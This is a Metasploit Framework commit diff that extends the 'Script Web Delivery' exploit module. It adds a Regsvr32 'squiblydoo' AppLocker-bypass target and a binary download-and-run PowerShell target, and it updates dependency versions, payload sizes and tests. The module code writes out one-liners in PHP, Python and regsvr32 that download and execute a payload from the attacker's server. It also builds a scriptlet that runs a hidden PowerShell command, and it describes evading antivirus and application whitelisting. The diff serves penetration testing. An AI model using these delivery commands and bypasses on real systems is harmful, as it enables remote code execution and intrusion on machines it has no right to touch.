Land rapid7#9132, Restore changes from PR rapid7#8933

busterb · busterb · commit 2682e6ed91f6 · 2017-10-26T17:17:03.000-07:00
diff --git a/Gemfile.lock b/Gemfile.lock
@@ -49,7 +49,7 @@ PATH
       rex-mime
       rex-nop
       rex-ole
-      rex-powershell (< 0.1.73)
+      rex-powershell (< 0.1.78)
       rex-random_identifier
       rex-registry
       rex-rop_builder
@@ -278,7 +278,7 @@ GEM
       rex-arch
     rex-ole (0.1.6)
       rex-text
-    rex-powershell (0.1.72)
+    rex-powershell (0.1.77)
       rex-random_identifier
       rex-text
     rex-random_identifier (0.1.4)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
@@ -139,7 +139,7 @@ Gem::Specification.new do |spec|
   # Library for Generating Randomized strings valid as Identifiers such as variable names
   spec.add_runtime_dependency 'rex-random_identifier'
   # library for creating Powershell scripts for exploitation purposes
-  spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"]
+  spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"]
   # Library for processing and creating Zip compatbile archives
   spec.add_runtime_dependency 'rex-zip'
   # Library for parsing offline Windows Registry files
diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb
@@ -8,40 +8,54 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
+  include Msf::Exploit::EXE
   include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
     super(update_info(info,
       'Name'         => 'Script Web Delivery',
       'Description'  => %q(
-        This module quickly fires up a web server that serves a payload.
-        The provided command will start the specified scripting language interpreter and then download and execute the
-        payload. The main purpose of this module is to quickly establish a session on a target
-        machine when the attacker has to manually type in the command himself, e.g. Command Injection,
-        RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
-        write to disk so it is less likely to trigger AV solutions and will allow privilege
-        escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
-        payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
-        x86 payloads on x64 machines.
+           This module quickly fires up a web server that serves a payload.
+        The provided command which will allow for a payload to download and execute.
+        It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe
+        for bypassing application whitelisting. The main purpose of this module is to quickly establish
+        a session on a target machine when the attacker has to manually type in the command:
+        e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.
+        This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege
+        escalations supplied by Meterpreter.
+
+        When using either of the PSH targets, ensure the payload architecture matches the target computer
+        or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
+
+        Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting.
+        The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included
+        PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)
+        can occur on the same port.
+
+        "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.
       ),
       'License'      => MSF_LICENSE,
       'Author'       =>
         [
           'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
           'Ben Campbell',
-          'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
+          'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
+          'Casey Smith',    # AppLocker bypass research and vulnerability discovery (@subTee)
+          'Trenton Ivey',   # AppLocker MSF Module (kn0)
+          'g0tmi1k',        # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
       'DefaultOptions' =>
         {
           'Payload'    => 'python/meterpreter/reverse_tcp'
         },
       'References'     =>
         [
-          ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
-          ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
+          ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+          ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
           ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
+          ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
+          ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
         ],
       'Platform'       => %w(python php win),
       'Targets'        =>
@@ -57,45 +71,114 @@ def initialize(info = {})
           ['PSH', {
             'Platform' => 'win',
             'Arch' => [ARCH_X86, ARCH_X64]
+          }],
+          ['Regsvr32', {
+            'Platform' => 'win',
+            'Arch' => [ARCH_X86, ARCH_X64]
+          }],
+          ['PSH (Binary)', {
+            'Platform' => 'win',
+            'Arch' => [ARCH_X86, ARCH_X64]
           }]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 19 2013'
     ))
+
+  register_advanced_options(
+    [
+      OptBool.new('PSH-Proxy',            [ true,  'PSH - Use the system proxy', true ]),
+      OptString.new('PSHBinary-PATH',     [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
+      OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),
+    ], self.class
+  )
+  end
+
+
+  def primer
+    php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));")
+    python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());")
+    regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
+
+    print_status("Run the following command on the target machine:")
+    case target.name
+    when 'PHP'
+      print_line("#{php}")
+    when 'Python'
+      print_line("#{python}")
+    when 'PSH'
+      psh = gen_psh("#{get_uri}", "string")
+      print_line("#{psh}")
+    when 'Regsvr32'
+      print_line("#{regsvr}")
+    when 'PSH (Binary)'
+      psh = gen_psh("#{get_uri}", "download")
+      print_line("#{psh}")
+    end
   end
 
+
   def on_request_uri(cli, _request)
-    print_status('Delivering Payload')
-    if target.name.include? 'PSH'
+    if _request.raw_uri =~ /\.sct$/
+      psh = gen_psh("#{get_uri}", "string")
+      data = gen_sct_file(psh)
+    elsif target.name.include? 'PSH (Binary)'
+      data = generate_payload_exe
+    elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
       data = cmd_psh_payload(payload.encoded,
                              payload_instance.arch.first,
                              remove_comspec: true,
                              exec_in_place: true
                            )
     else
-      data = %Q(#{payload.encoded} )
+      data = %Q(#{payload.encoded})
+    end
+
+    if _request.raw_uri =~ /\.sct$/
+      print_status("Handling .sct Request")
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+    else
+      print_status("Delivering Payload")
+      send_response(cli, data, 'Content-Type' => 'application/octet-stream')
     end
-    send_response(cli, data,  'Content-Type' => 'application/octet-stream')
   end
 
-  def primer
-    url = get_uri
-    print_status('Run the following command on the target machine:')
-    case target.name
-    when 'PHP'
-      print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
-    when 'Python'
-      print_line('Python:')
-      print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"")
-    when 'PSH'
+
+  def gen_psh(url, *method)
       ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
-      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
+
+      if method.include? 'string'
+        download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
+      else
+        # Random filename to use, if there isn't anything set
+        random = "#{rand_text_alphanumeric 8}.exe"
+
+        # Set filename (Use random filename if empty)
+        filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
+
+        # Set path (Use %TEMP% if empty)
+        path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
+
+        # Join Path and Filename
+        file = %Q(echo (#{path}+'\\#{filename}'))
+
+        # Generate download PowerShell command
+        download_string = Rex::Powershell::PshMethods.download_run(url, file)
+      end
+
       download_and_run = "#{ignore_cert}#{download_string}"
-      print_line generate_psh_command_line(
-                                             noprofile: true,
-                                             windowstyle: 'hidden',
-                                             command: download_and_run
-                                           )
-    end
+
+      # Generate main PowerShell command
+      return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
+  end
+
+
+  def rand_class_id
+    "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
+  end
+
+
+  def gen_sct_file(command)
+    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
   end
 end
diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb')
 
   def initialize(info = {})
     super(update_info(info,
diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1501
+  CachedSize = 1518
 
   include Msf::Payload::Single
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1509
+  CachedSize = 1526
 
   include Msf::Payload::Single
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -15,7 +15,7 @@
 ###
 module MetasploitModule
 
-  CachedSize = 1501
+  CachedSize = 1518
 
   include Msf::Payload::Windows::Exec
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -15,7 +15,7 @@
 ###
 module MetasploitModule
 
-  CachedSize = 1509
+  CachedSize = 1526
 
   include Msf::Payload::Windows::Exec
   include Msf::Payload::Windows::Powershell
diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@@ -15,7 +15,7 @@
 ###
 module MetasploitModule
 
-  CachedSize = 1501
+  CachedSize = 1518
 
   include Msf::Payload::Windows::Exec_x64
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -15,7 +15,7 @@
 ###
 module MetasploitModule
 
-  CachedSize = 1509
+  CachedSize = 1526
 
   include Msf::Payload::Windows::Exec_x64
   include Msf::Payload::Windows::Powershell
diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb
@@ -313,14 +313,9 @@ def decompress(code)
         subject.datastore['Powershell::method'] = 'msil'
         subject.options.validate(subject.datastore)
       end
-      it 'should raise an exception' do
-        except = false
-        begin
-          subject.cmd_psh_payload(payload, arch)
-        rescue RuntimeError
-          except = true
-        end
-        expect(except).to be_truthy
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch)
+        expect(decompress(code).include?('System.Reflection.MethodInfo')).to be_truthy
       end
     end
 
@@ -396,10 +391,10 @@ def decompress(code)
       end
     end
 
-    context 'when use single quotes' do
-      it 'should wrap in single quotes' do
-        code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true})
-        expect(code.include?(' -c \'')).to be_truthy
+    context 'when wrap double quotes' do
+      it 'should wrap in double quotes' do
+        code = subject.cmd_psh_payload(payload, arch, {:wrap_double_quotes => true})
+        expect(code.include?(' -c "')).to be_truthy
       end
     end
   end
@@ -449,7 +444,8 @@ def decompress(code)
                     [:sta, true],
                     [:noprofile, true],
                     [:windowstyle, "hidden"],
-                    [:command, "Z"]
+                    [:command, "Z"],
+                    [:wrap_double_quotes, true]
     ]
 
     permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]}
@@ -464,20 +460,21 @@ def decompress(code)
           opts[:shorten] = false
           long_args = subject.generate_psh_args(opts)
 
-          opt_length = opts.length - 1
-
           expect(short_args).not_to be_nil
           expect(long_args).not_to be_nil
-          expect(short_args.count('-')).to eql opt_length
-          expect(long_args.count('-')).to eql opt_length
           expect(short_args[0]).not_to eql " "
           expect(long_args[0]).not_to eql " "
           expect(short_args[-1]).not_to eql " "
           expect(long_args[-1]).not_to eql " "
 
           if opts[:command]
-            expect(long_args[-10..-1]).to eql "-Command Z"
-            expect(short_args[-4..-1]).to eql "-c Z"
+            if opts[:wrap_double_quotes]
+              expect(long_args[-12..-1]).to eql "-Command \"Z\""
+              expect(short_args[-6..-1]).to eql "-c \"Z\""
+            else
+              expect(long_args[-10..-1]).to eql "-Command Z"
+              expect(short_args[-4..-1]).to eql "-c Z"
+            end
           end
        end
       end
